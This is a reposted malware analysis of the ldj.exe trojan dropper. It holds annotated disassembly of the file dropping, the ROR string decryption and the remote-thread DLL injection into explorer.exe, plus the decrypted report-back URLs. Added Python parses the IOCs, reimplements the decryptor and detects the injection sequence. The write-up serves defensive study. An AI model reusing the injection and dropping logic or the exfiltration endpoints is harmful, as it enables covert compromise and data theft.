Saturday, September 10, 2011

[Repost] Analysis of ldj.exe, with part of the removal-tool code attached




Author: 曹無咎
Time: 2011-08-10, 17:05:35
Link: http://bbs.pediy.com/showthread.php?t=138549

The NDRC (發改委) website was found serving a drive-by download; 芳芳 spotted it, and I did some analysis.
Analysis of the parent file ldj.exe: (after the parent finishes loading the OCX the code becomes chaotic; I don't know whether there is another trojan on my machine or whether it is an after-effect of the loading)
Its main behaviours:
1. Generates dbr99008.ocx and dbr31004.ocx
2. Copies rundll32.exe to C:\WINDOWS\SYSTEM32\gbvgbv31.exe and runs it, loading the files above and injecting into explorer.exe
3. Interacts via WinSta0\Default
4. Decrypts 4 report-back URLs (the addresses stolen data is sent to):
00401100 68 74 74 70 3A 2F 2F 67 http://g
00401110 75 63 63 69 2E 74 6C 79 73 6A 2E 63 6F 6D 3A 39 ucci.tlysj.com:9
00401120 39 36 32 2F 66 72 62 2F 72 62 2E 61 73 70 962/frb/rb.asp
00401180 68 74 74 70 3A 2F 2F 67 http://g
00401190 75 63 63 69 2E 74 6C 79 73 6A 2E 63 6F 6D 3A 39 ucci.tlysj.com:9
004011A0 39 36 32 2F 66 74 2E 61 73 70 962/ft.asp
00401208 68 74 74 70 3A 2F 2F 67 75 63 63 69 2E 74 6C 79 http://gucci.tly
00401218 73 6A 2E 63 6F 6D 3A 39 39 36 32 2F 46 6F 6E 65 sj.com:9962/Fone
00401228 39 2F 6A 75 73 74 2E 61 73 70 9/just.asp
00401288 68 74 74 70 3A 2F 2F 76 35 2E 37 31 77 61 70 2E http://v5.71wap.
00401298 63 6F 6D 3A 39 39 36 32 2F 46 6F 6E 65 39 2F 6A com:9962/Fone9/j
004012A8 75 73 74 2E 61 73 70 ust.asp
It also generates a .ttf font file. I found no purpose for it; it is probably an intermediate step, but I never found this file in the fonts folder!!
The parent is UPX-packed; after reaching the OEP there are only some simple functions, so I won't paste that code.
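The four decrypted addresses above survive only as a debugger memory dump. As an added example (not part of the original post), here is a small Python parser that reconstructs the strings from the hex-byte column of those dump rows so they can be handed on as network IOCs; it assumes the dump layout used above (address, hex bytes, then an ASCII column, 16 bytes per full row) and ignores the ASCII column entirely.

```python
import re

# Constructed input: the debugger dump rows quoted in the write-up above
# (address, hex bytes, ASCII column). Only the hex bytes are decoded.
DUMP_ROWS = """\
00401100 68 74 74 70 3A 2F 2F 67 http://g
00401110 75 63 63 69 2E 74 6C 79 73 6A 2E 63 6F 6D 3A 39 ucci.tlysj.com:9
00401120 39 36 32 2F 66 72 62 2F 72 62 2E 61 73 70 962/frb/rb.asp
00401180 68 74 74 70 3A 2F 2F 67 http://g
00401190 75 63 63 69 2E 74 6C 79 73 6A 2E 63 6F 6D 3A 39 ucci.tlysj.com:9
004011A0 39 36 32 2F 66 74 2E 61 73 70 962/ft.asp
00401208 68 74 74 70 3A 2F 2F 67 75 63 63 69 2E 74 6C 79 http://gucci.tly
00401218 73 6A 2E 63 6F 6D 3A 39 39 36 32 2F 46 6F 6E 65 sj.com:9962/Fone
00401228 39 2F 6A 75 73 74 2E 61 73 70 9/just.asp
00401288 68 74 74 70 3A 2F 2F 76 35 2E 37 31 77 61 70 2E http://v5.71wap.
00401298 63 6F 6D 3A 39 39 36 32 2F 46 6F 6E 65 39 2F 6A com:9962/Fone9/j
004012A8 75 73 74 2E 61 73 70 ust.asp
"""

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")
ROW_STRIDE = 16  # bytes per full dump row in this debugger's layout (assumption)


def parse_row(line):
    """Return (address, bytes) for one dump row.

    The ASCII column is detected as the first token that is not exactly two
    hex digits, which holds for the rows above but is not a general rule."""
    tokens = line.split()
    addr = int(tokens[0], 16)
    data = bytearray()
    for tok in tokens[1:]:
        if not HEX_BYTE.match(tok):
            break
        data.append(int(tok, 16))
    return addr, bytes(data)


def extract_strings(dump_text, stride=ROW_STRIDE):
    """Concatenate rows into one string while the address advances by at most
    one row; a larger jump (the dumper skipped unselected bytes) starts a new
    string. Returns the decoded strings in dump order."""
    strings, current, prev_addr = [], bytearray(), None
    for line in dump_text.splitlines():
        if not line.strip():
            continue
        addr, data = parse_row(line)
        if prev_addr is not None and addr - prev_addr > stride:
            strings.append(current.decode("ascii", "replace"))
            current = bytearray()
        current += data
        prev_addr = addr
    if current:
        strings.append(current.decode("ascii", "replace"))
    return strings


def report_urls(dump_text=DUMP_ROWS):
    """Only the http:// strings are of interest as IOCs."""
    return [s for s in extract_strings(dump_text) if s.startswith("http://")]


if __name__ == "__main__":
    for url in report_urls():
        print(url)
```

The row-gap rule is what makes this work on a selection dump like the one above: the first row of each string holds fewer than 16 bytes, so address arithmetic on byte counts would not line up, but consecutive rows of one string are never more than one row stride apart.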

Code:
00401EB9 55 push ebp
00401EBA 8BEC mov ebp, esp
00401EBC 81EC 580A0000 sub esp, 0A58
00401EC2 53 push ebx
00401EC3 56 push esi
00401EC4 57 push edi
00401EC5 6A 40 push 40
00401EC7 33DB xor ebx, ebx
00401EC9 59 pop ecx
00401ECA 33C0 xor eax, eax
00401ECC 8DBD C9FDFFFF lea edi, dword ptr [ebp-237]
00401ED2 889D C8FDFFFF mov byte ptr [ebp-238], bl
00401ED8 8B35 A8104000 mov esi, dword ptr [4010A8] ; MSVCRT.sprintf
00401EDE F3:AB rep stos dword ptr es:[edi]
00401EE0 66:AB stos word ptr es:[edi]
00401EE2 AA stos byte ptr es:[edi]
00401EE3 68 FC154000 push 004015FC ; ASCII "008"
00401EE8 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
00401EEE 68 F0154000 push 004015F0 ; ASCII "dbr99%s.ocx"
00401EF3 50 push eax
00401EF4 C645 FC 54 mov byte ptr [ebp-4], 54 ; TLS
00401EF8 C645 FD 4C mov byte ptr [ebp-3], 4C
00401EFC C645 FE 53 mov byte ptr [ebp-2], 53
00401F00 885D FF mov byte ptr [ebp-1], bl
00401F03 FFD6 call esi
00401F05 83C4 0C add esp, 0C
00401F08 33C0 xor eax, eax
00401F0A 8DBD C5FCFFFF lea edi, dword ptr [ebp-33B]
00401F10 889D C4FCFFFF mov byte ptr [ebp-33C], bl
00401F16 6A 40 push 40
00401F18 889D C0FBFFFF mov byte ptr [ebp-440], bl
00401F1E 59 pop ecx
00401F1F C685 CCFEFFFF 7>mov byte ptr [ebp-134], 72
00401F26 F3:AB rep stos dword ptr es:[edi]
00401F28 66:AB stos word ptr es:[edi]
00401F2A AA stos byte ptr es:[edi]
00401F2B 6A 40 push 40
00401F2D 33C0 xor eax, eax
00401F2F 59 pop ecx
00401F30 8DBD C1FBFFFF lea edi, dword ptr [ebp-43F]
00401F36 F3:AB rep stos dword ptr es:[edi]
00401F38 66:AB stos word ptr es:[edi]
00401F3A AA stos byte ptr es:[edi]
00401F3B 6A 3D push 3D
00401F3D 33C0 xor eax, eax
00401F3F 59 pop ecx
00401F40 8DBD D9FEFFFF lea edi, dword ptr [ebp-127]
00401F46 C685 CDFEFFFF 7>mov byte ptr [ebp-133], 75 ; rundll32.exe
00401F4D C685 CEFEFFFF 6>mov byte ptr [ebp-132], 6E
00401F54 C685 CFFEFFFF 6>mov byte ptr [ebp-131], 64
00401F5B C685 D0FEFFFF 6>mov byte ptr [ebp-130], 6C
00401F62 C685 D1FEFFFF 6>mov byte ptr [ebp-12F], 6C
00401F69 C685 D2FEFFFF 3>mov byte ptr [ebp-12E], 33
00401F70 C685 D3FEFFFF 3>mov byte ptr [ebp-12D], 32
00401F77 C685 D4FEFFFF 2>mov byte ptr [ebp-12C], 2E
00401F7E C685 D5FEFFFF 6>mov byte ptr [ebp-12B], 65
00401F85 C685 D6FEFFFF 7>mov byte ptr [ebp-12A], 78
00401F8C C685 D7FEFFFF 6>mov byte ptr [ebp-129], 65
00401F93 889D D8FEFFFF mov byte ptr [ebp-128], bl
00401F99 F3:AB rep stos dword ptr es:[edi]
00401F9B 66:AB stos word ptr es:[edi]
00401F9D AA stos byte ptr es:[edi]
00401F9E 6A 40 push 40
00401FA0 33C0 xor eax, eax
00401FA2 59 pop ecx
00401FA3 8DBD B9F9FFFF lea edi, dword ptr [ebp-647]
00401FA9 889D B8F9FFFF mov byte ptr [ebp-648], bl
00401FAF F3:AB rep stos dword ptr es:[edi]
00401FB1 66:AB stos word ptr es:[edi]
00401FB3 AA stos byte ptr es:[edi]
00401FB4 E8 02F9FFFF call 004018BB ; elevate privileges
00401FB9 BF 04010000 mov edi, 104
00401FBE 8D85 B0F7FFFF lea eax, dword ptr [ebp-850]
00401FC4 57 push edi
00401FC5 50 push eax
00401FC6 53 push ebx
00401FC7 FF15 50104000 call dword ptr [401050] ; kernel32.GetModuleFileNameA
00401FCD 8D45 D0 lea eax, dword ptr [ebp-30]
00401FD0 68 E4154000 push 004015E4 ; get the path for generating dbr31004.ocx
00401FD5 50 push eax
00401FD6 FFD6 call esi
00401FD8 8D45 D0 lea eax, dword ptr [ebp-30]
00401FDB 50 push eax
00401FDC 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
00401FE2 50 push eax
00401FE3 E8 A8020000 call 00402290 ; jmp to MSVCRT.strcpy
00401FE8 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
00401FEE 68 DC154000 push 004015DC ; ASCII ".ocx"
00401FF3 50 push eax
00401FF4 E8 91020000 call 0040228A ; jmp to MSVCRT.strcat
00401FF9 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
00401FFF 50 push eax
00402000 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
00402006 50 push eax
00402007 E8 BEFAFFFF call 00401ACA ; get the path C:\WINDOWS\SYSTEM32\dbr31004.ocx
0040200C 8D85 B0F7FFFF lea eax, dword ptr [ebp-850]
00402012 50 push eax
00402013 E8 8AFBFFFF call 00401BA2 ; opens the file, reads the data and decrypts the URLs; what is read here is the encrypted URLs, and the decryption happens inside

Here let's look at the decryption function. It is fairly simple: it takes the length of the string "LUDJ" as the inner loop bound, reads 118h bytes of data, and applies a simple ror to each byte.
Let's look at the decryption function (ror):

Code:
00401B3C 55 push ebp
00401B3D 8BEC mov ebp, esp
00401B3F 53 push ebx
00401B40 56 push esi
00401B41 57 push edi
00401B42 8B75 08 mov esi, dword ptr [ebp+8]
00401B45 8B7D 10 mov edi, dword ptr [ebp+10]
00401B48 8B5D 0C mov ebx, dword ptr [ebp+C]
00401B4B 8B55 14 mov edx, dword ptr [ebp+14]
00401B4E 85DB test ebx, ebx
00401B50 74 18 je short 00401B6A
00401B52 8A06 mov al, byte ptr [esi]
00401B54 8A0F mov cl, byte ptr [edi]
00401B56 D2C8 ror al, cl
00401B58 8806 mov byte ptr [esi], al
00401B5A 46 inc esi
00401B5B 47 inc edi
00401B5C 4B dec ebx
00401B5D 4A dec edx
00401B5E 85D2 test edx, edx
00401B60 ^ 75 EC jnz short 00401B4E
00401B62 8B55 14 mov edx, dword ptr [ebp+14]
00401B65 8B7D 10 mov edi, dword ptr [ebp+10]
00401B68 ^ EB E4 jmp short 00401B4E
00401B6A 5F pop edi
00401B6B 5E pop esi
00401B6C 5B pop ebx
00401B6D 5D pop ebp
00401B6E C3 retn
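The routine is short enough to reimplement, which lets the payload strings be recovered without running the sample. Below is an added Python reimplementation (not code from the original post) of sub_401B3C: each data byte is rotated right by the corresponding key byte, and the key pointer wraps when the key-length counter (edx) reaches zero, so the key "LUDJ" cycles over the 118h-byte blob as the write-up describes. The inverse rotation, the placeholder URLs and the NUL-separated layout of the blob are constructed assumptions used only to build test input.

```python
KEY = b"LUDJ"        # key string named in the write-up
BLOB_SIZE = 0x118    # number of bytes the routine processes


def ror8(value, count):
    """8-bit rotate right. x86 `ror al, cl` rotates a byte by cl mod 8,
    so 'L' (0x4C) rotates by 4, 'U' (0x55) by 5, and so on."""
    count &= 7
    return ((value >> count) | (value << (8 - count))) & 0xFF


def rol8(value, count):
    """8-bit rotate left, the inverse of ror8."""
    count &= 7
    return ((value << count) | (value >> (8 - count))) & 0xFF


def decrypt(data, key=KEY):
    """Mirror of sub_401B3C: ebx counts data bytes, edx counts key bytes and
    edi is reset to the key start when edx hits zero (i.e. key[i % len(key)])."""
    return bytes(ror8(b, key[i % len(key)]) for i, b in enumerate(data))


def encrypt(data, key=KEY):
    """Inverse transform (rotate left): used here only to build sample input."""
    return bytes(rol8(b, key[i % len(key)]) for i, b in enumerate(data))


def recover_urls(blob, key=KEY):
    """Decrypt a 118h-byte blob and split it on NUL bytes.
    Constructed assumption: the strings are NUL-separated and NUL-padded."""
    plain = decrypt(blob[:BLOB_SIZE], key)
    return [s.decode("ascii", "replace") for s in plain.split(b"\x00") if s]


# Constructed sample: two placeholder URLs (not the real ones), NUL-separated,
# padded to 118h bytes and run through the inverse rotation so decrypt() recovers them.
SAMPLE_PLAIN = (b"http://c2.example.invalid/rb.asp\x00"
                b"http://c2.example.invalid/ft.asp\x00")
SAMPLE_BLOB = encrypt(SAMPLE_PLAIN.ljust(BLOB_SIZE, b"\x00"))

if __name__ == "__main__":
    for url in recover_urls(SAMPLE_BLOB):
        print(url)
```

Because a rotate by the key byte is its own inverse under the opposite direction, a blob carved from the sample can be decrypted offline with `decrypt()` alone; zero bytes stay zero under any rotation, which is why the NUL padding survives intact.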
Code:
00402018 83C4 24 add esp, 24
0040201B 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
00402021 C645 F4 5C mov byte ptr [ebp-C], 5C ; build the path fonts\dbr31004.ttf
00402025 C645 F5 66 mov byte ptr [ebp-B], 66
00402029 57 push edi
0040202A 50 push eax
0040202B C645 F6 6F mov byte ptr [ebp-A], 6F
0040202F C645 F7 6E mov byte ptr [ebp-9], 6E
00402033 C645 F8 74 mov byte ptr [ebp-8], 74
00402037 C645 F9 73 mov byte ptr [ebp-7], 73
0040203B C645 FA 5C mov byte ptr [ebp-6], 5C
0040203F 885D FB mov byte ptr [ebp-5], bl
00402042 FF15 4C104000 call dword ptr [40104C] ; kernel32.GetWindowsDirectoryA
00402048 8D45 F4 lea eax, dword ptr [ebp-C]
0040204B 50 push eax
0040204C 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
00402052 50 push eax
00402053 E8 32020000 call 0040228A ; jmp to MSVCRT.strcat
00402058 8D45 D0 lea eax, dword ptr [ebp-30]
0040205B 50 push eax
0040205C 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
00402062 50 push eax
00402063 E8 22020000 call 0040228A ; jmp to MSVCRT.strcat
00402068 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
0040206E 68 D4154000 push 004015D4 ; ASCII ".ttf"
00402073 50 push eax
00402074 E8 11020000 call 0040228A ; jmp to MSVCRT.strcat
00402079 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
0040207F 50 push eax
00402080 E8 06FEFFFF call 00401E8B ; creates the file, but no such file was found in the corresponding directory
00402085 8B3D 70104000 mov edi, dword ptr [401070] ; kernel32.GetTickCount, gets the time elapsed since boot, used to generate a random file name
0040208B 83C4 1C add esp, 1C
0040208E FFD7 call edi
00402090 50 push eax
00402091 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
00402097 68 C4154000 push 004015C4 ; ASCII "%08Xmdd.temp"
0040209C 50 push eax
0040209D FFD6 call esi
0040209F 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020A5 50 push eax
004020A6 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020AC 50 push eax
004020AD E8 DAF9FFFF call 00401A8C ; these temp files are placed under the tmp path
004020B2 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020B8 50 push eax
004020B9 8D45 FC lea eax, dword ptr [ebp-4]
004020BC 6A 66 push 66
004020BE 50 push eax ;TLS
004020BF 53 push ebx
004020C0 E8 61F8FFFF call 00401926 ; drops the file via FindResource, size 9E00, with the PE header at address 00404090
The purpose of this function is to generate dbr31004.ocx: using the temporary file obtained just above, it writes 9E00 bytes of data (from address 00404090) into it.
004020C5 83C4 24 add esp, 24
004020C8 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
004020CE 6A 03 push 3
004020D0 50 push eax
004020D1 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020D7 50 push eax
004020D8 FF15 54104000 call dword ptr [401054] ; kernel32.MoveFileExA, moves the temp file just generated into the system32 folder and then deletes the temp file
004020DE 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020E4 50 push eax
004020E5 FF15 58104000 call dword ptr [401058] ; kernel32.DeleteFileA
004020EB FFD7 call edi
004020ED 50 push eax
004020EE 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
004020F4 68 B4154000 push 004015B4 ; ASCII "%08Xeime.temp" same as above, not repeated: this generates dbr99008.ocx in system32, and the temp files generated in the tmp folder are all deleted
004020F9 50 push eax
004020FA FFD6 call esi
004020FC 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402102 50 push eax
00402103 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402109 50 push eax
0040210A E8 7DF9FFFF call 00401A8C
0040210F 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402115 50 push eax
00402116 8D45 FC lea eax, dword ptr [ebp-4]
00402119 6A 67 push 67
0040211B 50 push eax
0040211C 53 push ebx
0040211D E8 04F8FFFF call 00401926
00402122 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
00402128 50 push eax
00402129 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
0040212F 50 push eax
00402130 E8 95F9FFFF call 00401ACA ; get the system32 path, not described in detail again
00402135 83C4 2C add esp, 2C
00402138 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
0040213E 6A 03 push 3
00402140 50 push eax
00402141 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402147 50 push eax
00402148 FF15 54104000 call dword ptr [401054] ; kernel32.MoveFileExA
0040214E 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402154 50 push eax
00402155 FF15 58104000 call dword ptr [401058] ; kernel32.DeleteFileA
0040215B 8D85 CCFEFFFF lea eax, dword ptr [ebp-134]
00402161 50 push eax
00402162 8D85 CCFEFFFF lea eax, dword ptr [ebp-134]
00402168 50 push eax
00402169 E8 5CF9FFFF call 00401ACA
0040216E 8D85 B8F9FFFF lea eax, dword ptr [ebp-648]
00402174 50 push eax
00402175 68 A4154000 push 004015A4 ; ASCII "gbvgbv31.exe"
0040217A E8 4BF9FFFF call 00401ACA ; this gbvgbv.exe is really rundll32.exe, copied into the system32 folder
0040217F 83C4 10 add esp, 10
00402182 8D85 B8F9FFFF lea eax, dword ptr [ebp-648]
00402188 53 push ebx
00402189 50 push eax
0040218A 8D85 CCFEFFFF lea eax, dword ptr [ebp-134]
00402190 50 push eax
00402191 FF15 6C104000 call dword ptr [40106C] ; kernel32.CopyFileA
00402197 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
0040219D C645 E4 65 mov byte ptr [ebp-1C], 65 ; explorer.exe
004021A1 50 push eax
004021A2 8D45 E4 lea eax, dword ptr [ebp-1C]
004021A5 50 push eax
004021A6 C645 E5 78 mov byte ptr [ebp-1B], 78
004021AA C645 E6 70 mov byte ptr [ebp-1A], 70
004021AE C645 E7 6C mov byte ptr [ebp-19], 6C
004021B2 C645 E8 6F mov byte ptr [ebp-18], 6F
004021B6 C645 E9 72 mov byte ptr [ebp-17], 72
004021BA C645 EA 65 mov byte ptr [ebp-16], 65
004021BE C645 EB 72 mov byte ptr [ebp-15], 72
004021C2 C645 EC 2E mov byte ptr [ebp-14], 2E
004021C6 C645 ED 65 mov byte ptr [ebp-13], 65
004021CA C645 EE 78 mov byte ptr [ebp-12], 78
004021CE C645 EF 65 mov byte ptr [ebp-11], 65
004021D2 885D F0 mov byte ptr [ebp-10], bl
004021D5 E8 1BF5FFFF call 004016F5 ; this function creates a process snapshot, obtains the addresses of those three functions and looks for the explorer.exe process; here it is about to inject a thread

Let's see what it does after finding the process. This is function one:
Now let's look at the function that creates the process snapshot and injects into explorer:

Code:
00401600 55 push ebp
00401601 8BEC mov ebp, esp
00401603 81EC 08020000 sub esp, 208
00401609 53 push ebx
0040160A 56 push esi
0040160B 57 push edi
0040160C 6A 40 push 40
0040160E 33DB xor ebx, ebx
00401610 59 pop ecx
00401611 33C0 xor eax, eax
00401613 8DBD F9FDFFFF lea edi, dword ptr [ebp-207]
00401619 889D F8FDFFFF mov byte ptr [ebp-208], bl
0040161F 6A 40 push 40
00401621 F3:AB rep stos dword ptr es:[edi]
00401623 66:AB stos word ptr es:[edi]
00401625 AA stos byte ptr es:[edi]
00401626 59 pop ecx
00401627 33C0 xor eax, eax
00401629 8DBD FDFEFFFF lea edi, dword ptr [ebp-103]
0040162F 889D FCFEFFFF mov byte ptr [ebp-104], bl
00401635 F3:AB rep stos dword ptr es:[edi]
00401637 66:AB stos word ptr es:[edi]
00401639 AA stos byte ptr es:[edi]
0040163A E8 7C020000 call 004018BB ; this function was mentioned above: elevate privileges
0040163F FF75 08 push dword ptr [ebp+8]
00401642 53 push ebx
00401643 68 10040000 push 410
00401648 FF15 84104000 call dword ptr [401084] ; kernel32.OpenProcess, opens the explorer.exe process
0040164E 8BF8 mov edi, eax
00401650 3BFB cmp edi, ebx
00401652 0F84 8F000000 je 004016E7
00401658 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
0040165E 68 04010000 push 104
00401663 50 push eax
00401664 53 push ebx
00401665 57 push edi
00401666 E8 850C0000 call 004022F0 ; jmp to PSAPI.GetModuleFileNameExA, gets the file path C:\WINDOWS\Explorer.EXE
0040166B 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
00401671 50 push eax
00401672 E8 1F0C0000 call 00402296 ; jmp to MSVCRT.strlen
00401677 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
0040167D 50 push eax
0040167E 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
00401684 50 push eax
00401685 E8 060C0000 call 00402290 ; jmp to MSVCRT.strcpy
0040168A 8B35 94104000 mov esi, dword ptr [401094] ; MSVCRT.strrchr
00401690 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
00401696 6A 5C push 5C
00401698 50 push eax
00401699 FFD6 call esi ; position where explorer.exe first appears, 0012F2CA
0040169B 83C4 14 add esp, 14
0040169E 3BC3 cmp eax, ebx
004016A0 74 39 je short 004016DB
004016A2 8818 mov byte ptr [eax], bl
004016A4 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
004016AA 6A 5C push 5C
004016AC 50 push eax
004016AD FFD6 call esi
004016AF 59 pop ecx
004016B0 3BC3 cmp eax, ebx
004016B2 59 pop ecx
004016B3 74 26 je short 004016DB
004016B5 8818 mov byte ptr [eax], bl
004016B7 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
004016BD 68 38154000 push 00401538 ; ASCII "\data\elements.data"
004016C2 50 push eax
004016C3 E8 C20B0000 call 0040228A ; jmp to MSVCRT.strcat, giving the path C:\data\elements.data
004016C8 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
004016CE 50 push eax
004016CF E8 D5020000 call 004019A9 ; FindFirstFile, the file was not found
004016D4 83C4 0C add esp, 0C
004016D7 85C0 test eax, eax
004016D9 74 13 je short 004016EE
004016DB 57 push edi
004016DC FF15 88104000 call dword ptr [401088] ; kernel32.CloseHandle
004016E2 6A 01 push 1
004016E4 58 pop eax
004016E5 EB 09 jmp short 004016F0
004016E7 53 push ebx
004016E8 FF15 88104000 call dword ptr [401088] ; kernel32.CloseHandle
004016EE 33C0 xor eax, eax
004016F0 5F pop edi
004016F1 5E pop esi
004016F2 5B pop ebx
004016F3 C9 leave
004016F4 C3 retn
Function two: this is the one that really writes data into the process:

Code:
00401A62 56 push esi
00401A63 FF7424 08 push dword ptr [esp+8]
00401A67 6A 00 push 0
00401A69 6A 2A push 2A
00401A6B FF15 84104000 call dword ptr [401084] ; kernel32.OpenProcess
00401A71 8BF0 mov esi, eax
00401A73 85F6 test esi, esi
00401A75 74 13 je short 00401A8A
00401A77 FF7424 0C push dword ptr [esp+C]
00401A7B 56 push esi
00401A7C E8 56FFFFFF call 004019D7 ; this function is the one that writes the data
00401A81 59 pop ecx
00401A82 59 pop ecx
00401A83 56 push esi
00401A84 FF15 88104000 call dword ptr [401088] ; kernel32.CloseHandle
00401A8A 5E pop esi
00401A8B C3 retn
So let's see what function 004019D7 does:


Code:
004019D7 55 push ebp
004019D8 8BEC mov ebp, esp
004019DA 51 push ecx
004019DB 51 push ecx
004019DC 53 push ebx
004019DD 56 push esi
004019DE 57 push edi
004019DF FF75 0C push dword ptr [ebp+C]
004019E2 FF15 14104000 call dword ptr [401014] ; kernel32.lstrlenA
004019E8 8B5D 08 mov ebx, dword ptr [ebp+8]
004019EB 8BF0 mov esi, eax
004019ED 46 inc esi
004019EE 6A 40 push 40
004019F0 68 00100000 push 1000
004019F5 56 push esi
004019F6 6A 00 push 0
004019F8 53 push ebx
004019F9 FF15 44104000 call dword ptr [401044] ; kernel32.VirtualAllocEx, allocates space in the target process, size 21h; the returned base address was 02380000
004019FF 8BF8 mov edi, eax
00401A01 85FF test edi, edi
00401A03 74 3B je short 00401A40
00401A05 8D45 FC lea eax, dword ptr [ebp-4]
00401A08 50 push eax
00401A09 56 push esi
00401A0A FF75 0C push dword ptr [ebp+C]
00401A0D 57 push edi
00401A0E 53 push ebx
00401A0F FF15 40104000 call dword ptr [401040] ; kernel32.WriteProcessMemory, writes the dbr99008.ocx path into the newly allocated space at 02380000
00401A15 85C0 test eax, eax
00401A17 74 27 je short 00401A40
00401A19 8D45 F8 lea eax, dword ptr [ebp-8]
00401A1C 50 push eax
00401A1D 33C0 xor eax, eax
00401A1F 50 push eax
00401A20 57 push edi
00401A21 FF35 7C104000 push dword ptr [40107C] ; kernel32.LoadLibraryA
00401A27 50 push eax
00401A28 50 push eax
00401A29 53 push ebx
00401A2A FF15 3C104000 call dword ptr [40103C] ; kernel32.CreateRemoteThread, creates a remote thread

0012F380 00000080 |hProcess = 00000080 (window)
0012F384 00000000 |lpThreadAttributes
0012F388 00000000 |dwStackSize = 0
0012F38C 7C801D7B |lpStartAddress = kernel32.LoadLibraryA
0012F390 02380000 |lpParameter = 02380000
0012F394 00000000 |dwCreationFlags = 0
0012F398 0012F3A8 \lpThreadId = 0012F3A8


00401A30 85C0 test eax, eax
00401A32 8945 0C mov dword ptr [ebp+C], eax
00401A35 74 09 je short 00401A40
00401A37 6A FF push -1
00401A39 50 push eax
00401A3A FF15 38104000 call dword ptr [401038] ; kernel32.WaitForSingleObject
00401A40 68 00400000 push 4000
00401A45 56 push esi
00401A46 57 push edi
00401A47 53 push ebx
00401A48 FF15 34104000 call dword ptr [401034] ; kernel32.VirtualFreeEx
00401A4E 837D 0C 00 cmp dword ptr [ebp+C], 0
00401A52 5F pop edi
00401A53 5E pop esi
00401A54 5B pop ebx
00401A55 74 09 je short 00401A60
00401A57 FF75 0C push dword ptr [ebp+C]
00401A5A FF15 88104000 call dword ptr [401088] ; kernel32.CloseHandle
00401A60 C9 leave
00401A61 C3 retn
That is the injection function!
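From the defender's side, the sequence above (OpenProcess, VirtualAllocEx, WriteProcessMemory, then CreateRemoteThread with LoadLibraryA as the start address and the written buffer as its argument) is the classic remote DLL-load pattern worth alerting on. The Python below is an added example, not part of the original post: it correlates a constructed API-call trace (the key=value line format, the pids and the second, benign process are all assumptions) and reports injector/target pairs only when all four steps line up on the same process handle.

```python
from collections import defaultdict

# Constructed API-trace lines (not from the page): one call per line, key=value fields.
# The handle and buffer values mirror those shown in the write-up (hProcess 0x80, 02380000).
TRACE = """\
pid=1500 api=OpenProcess target_pid=1234 access=0x2a ret=0x80
pid=1500 api=VirtualAllocEx hProcess=0x80 size=0x21 alloc=0x1000 protect=0x40 ret=0x02380000
pid=1500 api=WriteProcessMemory hProcess=0x80 addr=0x02380000 size=0x21 ret=1
pid=1500 api=CreateRemoteThread hProcess=0x80 start=kernel32.LoadLibraryA param=0x02380000 ret=0x84
pid=1500 api=WaitForSingleObject handle=0x84 timeout=-1 ret=0
pid=1500 api=VirtualFreeEx hProcess=0x80 addr=0x02380000 free=0x4000 ret=1
pid=1600 api=OpenProcess target_pid=2222 access=0x410 ret=0x90
pid=1600 api=ReadProcessMemory hProcess=0x90 addr=0x00400000 size=0x100 ret=1
"""


def parse_line(line):
    """Split 'k=v k=v ...' into a dict; values stay as strings."""
    return dict(field.split("=", 1) for field in line.split())


def detect_remote_dll_load(trace_text):
    """Return (injector_pid, target_pid) pairs that follow the sequence seen in
    sub_4019D7: open a handle, allocate in the target, write into that allocation,
    then start a remote thread at LoadLibraryA with the allocation as its argument.
    A process that merely opens and reads another process is not reported."""
    targets = {}                  # (pid, hProcess) -> pid of the opened process
    allocs = defaultdict(dict)    # (pid, hProcess) -> {remote address: written?}
    hits = []
    for line in trace_text.splitlines():
        if not line.strip():
            continue
        f = parse_line(line)
        pid, api = f["pid"], f["api"]
        if api == "OpenProcess":
            targets[(pid, f["ret"])] = f["target_pid"]
            continue
        key = (pid, f.get("hProcess"))
        if key not in targets:
            continue
        if api == "VirtualAllocEx":
            allocs[key][f["ret"]] = False
        elif api == "WriteProcessMemory" and f["addr"] in allocs[key]:
            allocs[key][f["addr"]] = True
        elif api == "CreateRemoteThread":
            at_loadlibrary = f["start"].lower().endswith("loadlibrarya")
            if at_loadlibrary and allocs[key].get(f["param"]):
                hits.append((pid, targets[key]))
    return hits


if __name__ == "__main__":
    for injector, target in detect_remote_dll_load(TRACE):
        print(f"pid {injector} loaded a DLL into pid {target} via CreateRemoteThread(LoadLibraryA)")
```

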